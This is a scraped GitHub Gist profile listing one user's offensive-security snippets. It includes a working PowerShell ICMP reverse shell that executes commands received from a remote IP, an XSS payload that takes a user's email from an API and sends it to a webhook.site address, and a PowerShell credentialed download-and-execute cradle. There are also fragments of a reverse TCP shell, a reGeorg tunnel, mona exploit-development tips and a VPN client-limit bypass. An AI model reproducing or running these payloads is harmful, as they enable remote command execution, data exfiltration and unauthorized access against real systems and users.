Skip to content

Instantly share code, notes, and snippets.

aDoN adon90

  • Spain
Block or report user

Report or block adon90

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@adon90
adon90 / reverse_icmp_optima.sh
Created Nov 28, 2019
View reverse_icmp_optima.sh
powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
@adon90
adon90 / leak.js
Created Oct 9, 2019
Perfect XSS Extraction + Information Leak
View leak.js
<script>
var req = new XMLHttpRequest();
req.onload = function () {
var patt2 = /OA_mail":\["([^"]*?)"/g;
var result = patt2.exec(req.responseText)[1];
new Image().src = ("http://webhook.site/f6dab550-defa-4310-9a79-d0c5c1e9fdcc/?cc="+result);
};
req.open("GET", "/api/dataUsers/v1/WebStore/getUser", true);
req.send();
</script>
@adon90
adon90 / re.py
Last active Sep 19, 2019
reGeorg with Cookie
View re.py
# 保存为 re.py ,然后 re.py -u http://xx.com/tunnel.aspx -p 8080 -s "PHPSESSIONID: xxxxxxxxxxxxxxxxxx"
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
@adon90
adon90 / VulnerableDotNetHTTPRemoting.cs
Created Mar 20, 2019
View VulnerableDotNetHTTPRemoting.cs
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
@adon90
adon90 / Frida
Created Oct 29, 2018
View Frida
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
@adon90
adon90 / ReverseC#TCP
Last active Sep 30, 2018
View ReverseC#TCP
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
{
@adon90
adon90 / powershell_api.txt
Created Jul 23, 2018
View powershell_api.txt
"@
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
{
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
@adon90
adon90 / exploiting.txt
Last active Aug 1, 2018
Exploiting Tricks
View exploiting.txt
Mona tricks:
---------------
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------
@adon90
adon90 / runas-cabesha-webdelivery
Last active Jul 17, 2018
View runas-cabesha-webdelivery
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
}
@adon90
adon90 / bypassvpn.txt
Last active Jul 10, 2018
Bypass VPN Number of Clients
View bypassvpn.txt
HOST
openvpn adon901.ovpn
COMPUTER 1
sshuttle -vr root@HOST 10.10.0.0/8
COMPUTER 2
sshuttle -vr root@HOST 10.10.0.0/8
HOST:
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
You can’t perform that action at this time.